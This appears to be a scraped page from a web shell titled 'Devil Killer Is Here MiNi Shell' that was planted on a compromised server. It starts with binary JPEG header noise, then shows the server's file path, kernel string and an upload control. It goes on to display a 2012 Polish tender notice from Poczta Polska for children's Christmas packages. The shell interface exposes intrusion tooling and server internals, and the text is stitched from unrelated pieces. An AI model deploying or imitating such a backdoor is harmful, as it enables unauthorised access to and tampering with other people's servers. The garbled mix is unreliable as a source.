JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121108/236353-N-2012.html

<p class="kh_header"><b>Szczecin: Dostawa paczek świątecznych dla dzieci.</b><br>
<b>Numer ogłoszenia: 236353 - 2012; data zamieszczenia: 08.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. w imieniu której działa Centrum Infrastruktury Oddział Regionalny w Szczecinie , al. Niepodległości 41/42, 70-940 Szczecin, woj. zachodniopomorskie, tel. 0-91 440 14 51, faks 0-91 440 14 67.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paczek świątecznych dla dzieci..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa na własny koszt oraz w ustalonym terminie paczek świątecznych dla dzieci pracowników objętych opieką socjalną przez Centrum Zarządzania Zasobami Ludzkimi Regionalny Ośrodek Doradztwa Personalnego w Szczecinie. 
Przedmiot zamówienia jest podzielony na trzy części i obejmuje dostawę maksymalnej ilości sztuk paczek:
Część 1 rejon szczeciński 
Zestaw 1 - 1145 sztuk, Zestaw 2 - 470 szt. 
Część 2 rejon stargardzki 
Zestaw 1 - 367 sztuk, Zestaw 2 - 160 szt.
Część 3 rejon koszaliński 
Zestaw 1 - 564 szt., Zestaw 2 - 211 szt.
Szczegółowy opis przedmiotu zamówienia (dla wszystkich części) określa załącznik nr 1 do siwz oraz wzór umowy załącznik C do siwz. Wykaz miejsc dostaw paczek stanowi załącznik nr 2 do wzoru umowy dla części 1,2,3.
Określona w załączniku nr 1 wielkość gramatury produktów stanowi wymagania minimalne, co do wagi zaproponowanego asortymentu. Dopuszcza się produkty o zwiększonej gramaturze, w tym również na skutek trwających akcji promocyjnych.
Zamawiający wymaga, aby słodycze i produkty spożywcze wyprodukowane były nie wcześniej niż 2012 roku z terminem przydatności do spożycia nie krótszym niż 3 miesiące od daty podpisania umowy.
Każda paczka powinna być zapakowana w estetyczne kolorowe torby foliowe utrzymane w świątecznej tonacji (w odpowiednio trwałą jedną reklamówkę w sposób uniemożliwiający wypadnięcie zawartości podczas przenoszenia). Wszystkie paczki powinny być identyczne pod względem ilościowym i jakościowym.
W zakresie obowiązków Wykonawcy leży również dostarczenie i rozładowanie, przez 
co najmniej dwóch przedstawicieli Wykonawcy do siedziby jednostek organizacyjnych, wskazanych w załączniku nr 2 do siwz na własny koszt i ryzyko. 
Zamawiający zastrzega sobie możliwość ograniczenia zamówienia o nie więcej niż 20% ilości paczek. Ostateczna ilość paczek w rozbiciu na poszczególne miejsca dostawa podana zostanie w terminie 3 dni po podpisaniu umowy. 
Opis oferty równoważnej 
1) Z uwagi na wyjątkową okoliczność, specyfikę i przeznaczenie przedmiotu zamówienia (asortyment wchodzący w skład paczki jest towarem nabywanym w ramach funduszu socjalnego jako paczki okolicznościowe - świąteczne przeznaczone dla dzieci pracowników zatrudnionych w strukturach Przedsiębiorstwa Zamawiającego), w załączniku nr 1 do SIWZ będącym opisem przedmiotu zamówienia wskazano nazwy handlowe, marki produktów, które Zamawiający chce otrzymać. Rozeznanie przeprowadzone przez Zamawiającego pozwala stwierdzić, że wskazane produkty cechują się pożądaną jakością, dużymi walorami smakowymi oraz w przeważającej mierze stanowią preferencje i upodobania pracowników, 
a w szczególności dzieci pracowników Zamawiającego, co gwarantujące ich pełne zadowolenie; 
2) Dla produktów wymienionych z nazwy handlowej dopuszcza się zaoferowanie produktów równoważnych. W przypadku złożenia przez Wykonawcę oferty równoważnej, Zamawiający dokona szczegółowej analizy oferowanego przedmiotu zamówienia, w szczególności poprzez  badanie receptury (składu), gramatury (wagi), kształtu i rodzaju opakowań oferowanych produktów równoważnych. Za produkty równoważne Zamawiający uzna takie, które: 
a) Będą posiadać taką samą bądź lepszą recepturę (skład), tj. zawartość najistotniejszych składników produktów równoważnych decydujących o walorach jakościowo-smakowych (np. kakao, orzechy, inne składniki) nie może być procentowo lub wagowo mniejsza niż produktów wymienionych z nazwy handlowej przez Zamawiającego; 
b) Będą posiadać taką samą lub większą gramaturę (wagę) jak produkty wymienione z nazwy handlowej przez Zamawiającego; 
c) Będą posiadać taki sam lub zbliżony kształt oraz rodzaj opakowania jak produkty wymienione z nazwy handlowej przez Zamawiającego; 
d) Nie dopuszcza się wyrobów czekoladopodobnych i w opakowaniach zastępczych; 
3) Składając ofertę równoważną Wykonawca winien w swojej ofercie określić nazwę handlową produktu równoważnego (poz. w załączniku nr 1) oraz przedłożyć próbkę zaoferowanego produktu równoważnego celem dokonania oceny zgodności..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.00-4, 15.81.21.00-4, 15.84.23.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmawiający na podstawie art. 144 ustawy Prawo zamówień publicznych dopuszcza możliwość wprowadzenia zmian do zawartej umowy w przypadku:
1)zmiany terminu, pod warunkiem, że:
a) zmiana będzie wynikała z przyczyn leżących po stronie Zamawiającego,
b) zmiana będzie wynikała z udokumentowanych nie zawinionych przyczyn leżących 
po stronie Wykonawcy.
2)zmiany w zakresie przedmiotu umowy, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zaprzestania produkcji danego asortymentu lub zmiany przepisów prawa, 
3)zmiany w zakresie powierzenia prac Podwykonawcy lub zmiana zakresu prac powierzonych podwykonawcy, pod warunkiem, że istnieje groźba niezrealizowania przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. 
Centrum Infrastruktury Oddział Regionalny w Szczecinie
Dział Zamówień Publicznych
al. Niepodległości 41/42
70 - 940 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2012 godzina 09:30, miejsce: Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Szczecinie
al. Niepodległości 41/42, 70 - 940 Szczecin, pokój nr 136 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa paczek świątecznych dla dzieci..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa na własny koszt oraz w ustalonym terminie paczek świątecznych dla dzieci pracowników objętych opieką socjalną przez Centrum Zarządzania Zasobami Ludzkimi Regionalny Ośrodek Doradztwa Personalnego w Szczecinie. 
Przedmiot zamówienia obejmuje dostawę maksymalnej ilości sztuk paczek:
Część 1 rejon szczeciński 
Zestaw 1 - 1145 sztuk, Zestaw 2 - 470 szt. 
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do siwz oraz wzór umowy załącznik C do siwz. Wykaz miejsc dostaw paczek stanowi załącznik 
nr 2 do wzoru umowy dla części 1.
Określona w załączniku nr 1 wielkość gramatury produktów stanowi wymagania minimalne, co do wagi zaproponowanego asortymentu. Dopuszcza się produkty o zwiększonej gramaturze, w tym również na skutek trwających akcji promocyjnych.
Zamawiający wymaga, aby słodycze i produkty spożywcze wyprodukowane były nie wcześniej niż 2012 roku z terminem przydatności do spożycia nie krótszym niż 3 miesiące od daty podpisania umowy.
Każda paczka powinna być zapakowana w estetyczne kolorowe torby foliowe utrzymane w świątecznej tonacji (w odpowiednio trwałą jedną reklamówkę w sposób uniemożliwiający wypadnięcie zawartości podczas przenoszenia). Wszystkie paczki powinny być identyczne pod względem ilościowym i jakościowym.
W zakresie obowiązków Wykonawcy leży również dostarczenie i rozładowanie, przez 
co najmniej dwóch przedstawicieli Wykonawcy do siedziby jednostek organizacyjnych, wskazanych w załączniku nr 2 do siwz na własny koszt i ryzyko. 
Zamawiający zastrzega sobie możliwość ograniczenia zamówienia o nie więcej niż 20% ilości paczek. Ostateczna ilość paczek w rozbiciu na poszczególne miejsca dostawa podana zostanie w terminie 3 dni po podpisaniu umowy. 
Opis oferty równoważnej 
1) Z uwagi na wyjątkową okoliczność, specyfikę i przeznaczenie przedmiotu zamówienia (asortyment wchodzący w skład paczki jest towarem nabywanym w ramach funduszu socjalnego jako paczki okolicznościowe - świąteczne przeznaczone dla dzieci pracowników zatrudnionych w strukturach Przedsiębiorstwa Zamawiającego), w załączniku nr 1 do SIWZ będącym opisem przedmiotu zamówienia wskazano nazwy handlowe, marki produktów, które Zamawiający chce otrzymać. Rozeznanie przeprowadzone przez Zamawiającego pozwala stwierdzić, że wskazane produkty cechują się pożądaną jakością, dużymi walorami smakowymi oraz w przeważającej mierze stanowią preferencje i upodobania pracowników, 
a w szczególności dzieci pracowników Zamawiającego, co gwarantujące ich pełne zadowolenie; 
2) Dla produktów wymienionych z nazwy handlowej dopuszcza się zaoferowanie produktów równoważnych. W przypadku złożenia przez Wykonawcę oferty równoważnej, Zamawiający dokona szczegółowej analizy oferowanego przedmiotu zamówienia, w szczególności poprzez  badanie receptury (składu), gramatury (wagi), kształtu i rodzaju opakowań oferowanych produktów równoważnych. Za produkty równoważne Zamawiający uzna takie, które: 
a) Będą posiadać taką samą bądź lepszą recepturę (skład), tj. zawartość najistotniejszych składników produktów równoważnych decydujących o walorach jakościowo-smakowych (np. kakao, orzechy, inne składniki) nie może być procentowo lub wagowo mniejsza niż produktów wymienionych z nazwy handlowej przez Zamawiającego; 
b) Będą posiadać taką samą lub większą gramaturę (wagę) jak produkty wymienione z nazwy handlowej przez Zamawiającego; 
c) Będą posiadać taki sam lub zbliżony kształt oraz rodzaj opakowania jak produkty wymienione z nazwy handlowej przez Zamawiającego; 
d) Nie dopuszcza się wyrobów czekoladopodobnych i w opakowaniach zastępczych; 
3) Składając ofertę równoważną Wykonawca winien w swojej ofercie określić nazwę handlową produktu równoważnego (poz. w załączniku nr 1) oraz przedłożyć próbkę zaoferowanego produktu równoważnego celem dokonania oceny zgodności..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.04-4, 15.81.21.00-4, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa paczek świątecznych dla dzieci..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa na własny koszt oraz w ustalonym terminie paczek świątecznych dla dzieci pracowników objętych opieką socjalną przez Centrum Zarządzania Zasobami Ludzkimi Regionalny Ośrodek Doradztwa Personalnego w Szczecinie. 
Przedmiot zamówienia jest podzielony na trzy części i obejmuje dostawę maksymalnej ilości sztuk paczek:
Część 2 rejon stargardzki 
Zestaw 1 - 367 sztuk, Zestaw 2 - 160 szt.
Zamawiający dopuszcza składanie ofert częściowych. 
Wykonawca może złożyć oferty częściowe na jedną lub więcej części bądź na całość zamówienia.

Szczegółowy opis przedmiotu zamówienia (dla wszystkich części) określa załącznik nr 1 do siwz oraz wzór umowy załącznik C do siwz. Wykaz miejsc dostaw paczek stanowi załącznik nr 2 do wzoru umowy dla części 2.

Określona w załączniku nr 1 wielkość gramatury produktów stanowi wymagania minimalne, co do wagi zaproponowanego asortymentu. Dopuszcza się produkty o zwiększonej gramaturze, w tym również na skutek trwających akcji promocyjnych.

Zamawiający wymaga, aby słodycze i produkty spożywcze wyprodukowane były nie wcześniej niż 2012 roku z terminem przydatności do spożycia nie krótszym niż 3 miesiące od daty podpisania umowy.
 
Każda paczka powinna być zapakowana w estetyczne kolorowe torby foliowe utrzymane w świątecznej tonacji (w odpowiednio trwałą jedną reklamówkę w sposób uniemożliwiający wypadnięcie zawartości podczas przenoszenia). Wszystkie paczki powinny być identyczne pod względem ilościowym i jakościowym.
W zakresie obowiązków Wykonawcy leży również dostarczenie i rozładowanie, przez 
co najmniej dwóch przedstawicieli Wykonawcy do siedziby jednostek organizacyjnych, wskazanych w załączniku nr 2 do siwz na własny koszt i ryzyko. 
 
Zamawiający zastrzega sobie możliwość ograniczenia zamówienia o nie więcej niż 20% ilości paczek. Ostateczna ilość paczek w rozbiciu na poszczególne miejsca dostawa podana zostanie w terminie 3 dni po podpisaniu umowy. 
Opis oferty równoważnej 
1) Z uwagi na wyjątkową okoliczność, specyfikę i przeznaczenie przedmiotu zamówienia (asortyment wchodzący w skład paczki jest towarem nabywanym w ramach funduszu socjalnego jako paczki okolicznościowe - świąteczne przeznaczone dla dzieci pracowników zatrudnionych w strukturach Przedsiębiorstwa Zamawiającego), w załączniku nr 1 do SIWZ będącym opisem przedmiotu zamówienia wskazano nazwy handlowe, marki produktów, które Zamawiający chce otrzymać. Rozeznanie przeprowadzone przez Zamawiającego pozwala stwierdzić, że wskazane produkty cechują się pożądaną jakością, dużymi walorami smakowymi oraz w przeważającej mierze stanowią preferencje i upodobania pracowników, 
a w szczególności dzieci pracowników Zamawiającego, co gwarantujące ich pełne zadowolenie; 
2) Dla produktów wymienionych z nazwy handlowej dopuszcza się zaoferowanie produktów równoważnych. W przypadku złożenia przez Wykonawcę oferty równoważnej, Zamawiający dokona szczegółowej analizy oferowanego przedmiotu zamówienia, w szczególności poprzez  badanie receptury (składu), gramatury (wagi), kształtu i rodzaju opakowań oferowanych produktów równoważnych. Za produkty równoważne Zamawiający uzna takie, które: 
a) Będą posiadać taką samą bądź lepszą recepturę (skład), tj. zawartość najistotniejszych składników produktów równoważnych decydujących o walorach jakościowo-smakowych (np. kakao, orzechy, inne składniki) nie może być procentowo lub wagowo mniejsza niż produktów wymienionych z nazwy handlowej przez Zamawiającego; 
b) Będą posiadać taką samą lub większą gramaturę (wagę) jak produkty wymienione z nazwy handlowej przez Zamawiającego; 
c) Będą posiadać taki sam lub zbliżony kształt oraz rodzaj opakowania jak produkty wymienione z nazwy handlowej przez Zamawiającego; 
d) Nie dopuszcza się wyrobów czekoladopodobnych i w opakowaniach zastępczych; 
3) Składając ofertę równoważną Wykonawca winien w swojej ofercie określić nazwę handlową produktu równoważnego (poz. w załączniku nr 1) oraz przedłożyć próbkę zaoferowanego produktu równoważnego celem dokonania oceny zgodności..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.00-4, 15.81.21.00-4, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa paczek świątecznych dla dzieci..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa na własny koszt oraz w ustalonym terminie paczek świątecznych dla dzieci pracowników objętych opieką socjalną przez Centrum Zarządzania Zasobami Ludzkimi Regionalny Ośrodek Doradztwa Personalnego w Szczecinie. 
Przedmiot zamówienia jest podzielony na trzy części i obejmuje dostawę maksymalnej ilości sztuk paczek:
Część 3 rejon koszaliński 
Zestaw 1 - 562 szt., Zestaw 2 - 211 szt.
Zamawiający dopuszcza składanie ofert częściowych. 
Wykonawca może złożyć oferty częściowe na jedną lub więcej części bądź na całość zamówienia.
Szczegółowy opis przedmiotu zamówienia (dla wszystkich części) określa załącznik nr 1 do siwz oraz wzór umowy załącznik C do siwz. Wykaz miejsc dostaw paczek stanowi załącznik nr 2 do wzoru umowy dla części 3.

Określona w załączniku nr 1 wielkość gramatury produktów stanowi wymagania minimalne, 
co do wagi zaproponowanego asortymentu. Dopuszcza się produkty o zwiększonej gramaturze, w tym również na skutek trwających akcji promocyjnych.

Zamawiający wymaga, aby słodycze i produkty spożywcze wyprodukowane były nie wcześniej niż 2012 roku z terminem przydatności do spożycia nie krótszym niż 3 miesiące od daty podpisania umowy.
 
Każda paczka powinna być zapakowana w estetyczne kolorowe torby foliowe utrzymane 
w świątecznej tonacji (w odpowiednio trwałą jedną reklamówkę w sposób uniemożliwiający wypadnięcie zawartości podczas przenoszenia). Wszystkie paczki powinny być identyczne pod względem ilościowym i jakościowym.
W zakresie obowiązków Wykonawcy leży również dostarczenie i rozładowanie, przez 
co najmniej dwóch przedstawicieli Wykonawcy do siedziby jednostek organizacyjnych, wskazanych w załączniku nr 2 do siwz na własny koszt i ryzyko. 
 
Zamawiający zastrzega sobie możliwość ograniczenia zamówienia o nie więcej niż 20% ilości paczek. Ostateczna ilość paczek w rozbiciu na poszczególne miejsca dostawa podana zostanie w terminie 3 dni po podpisaniu umowy. 
Opis oferty równoważnej 
1) Z uwagi na wyjątkową okoliczność, specyfikę i przeznaczenie przedmiotu zamówienia (asortyment wchodzący w skład paczki jest towarem nabywanym w ramach funduszu socjalnego jako paczki okolicznościowe - świąteczne przeznaczone dla dzieci pracowników zatrudnionych w strukturach Przedsiębiorstwa Zamawiającego), w załączniku nr 1 do SIWZ będącym opisem przedmiotu zamówienia wskazano nazwy handlowe, marki produktów, które Zamawiający chce otrzymać. Rozeznanie przeprowadzone przez Zamawiającego pozwala stwierdzić, że wskazane produkty cechują się pożądaną jakością, dużymi walorami smakowymi oraz w przeważającej mierze stanowią preferencje i upodobania pracowników, 
a w szczególności dzieci pracowników Zamawiającego, co gwarantujące ich pełne zadowolenie; 
2) Dla produktów wymienionych z nazwy handlowej dopuszcza się zaoferowanie produktów równoważnych. W przypadku złożenia przez Wykonawcę oferty równoważnej, Zamawiający dokona szczegółowej analizy oferowanego przedmiotu zamówienia, w szczególności poprzez  badanie receptury (składu), gramatury (wagi), kształtu i rodzaju opakowań oferowanych produktów równoważnych. Za produkty równoważne Zamawiający uzna takie, które: 
a) Będą posiadać taką samą bądź lepszą recepturę (skład), tj. zawartość najistotniejszych składników produktów równoważnych decydujących o walorach jakościowo-smakowych (np. kakao, orzechy, inne składniki) nie może być procentowo lub wagowo mniejsza niż produktów wymienionych z nazwy handlowej przez Zamawiającego; 
b) Będą posiadać taką samą lub większą gramaturę (wagę) jak produkty wymienione z nazwy handlowej przez Zamawiającego; 
c) Będą posiadać taki sam lub zbliżony kształt oraz rodzaj opakowania jak produkty wymienione z nazwy handlowej przez Zamawiającego; 
d) Nie dopuszcza się wyrobów czekoladopodobnych i w opakowaniach zastępczych; 
3) Składając ofertę równoważną Wykonawca winien w swojej ofercie określić nazwę handlową produktu równoważnego (poz. w załączniku nr 1) oraz przedłożyć próbkę zaoferowanego produktu równoważnego celem dokonania oceny zgodności..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.00-4, 15.81.21.00-4, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2012.</p></li>
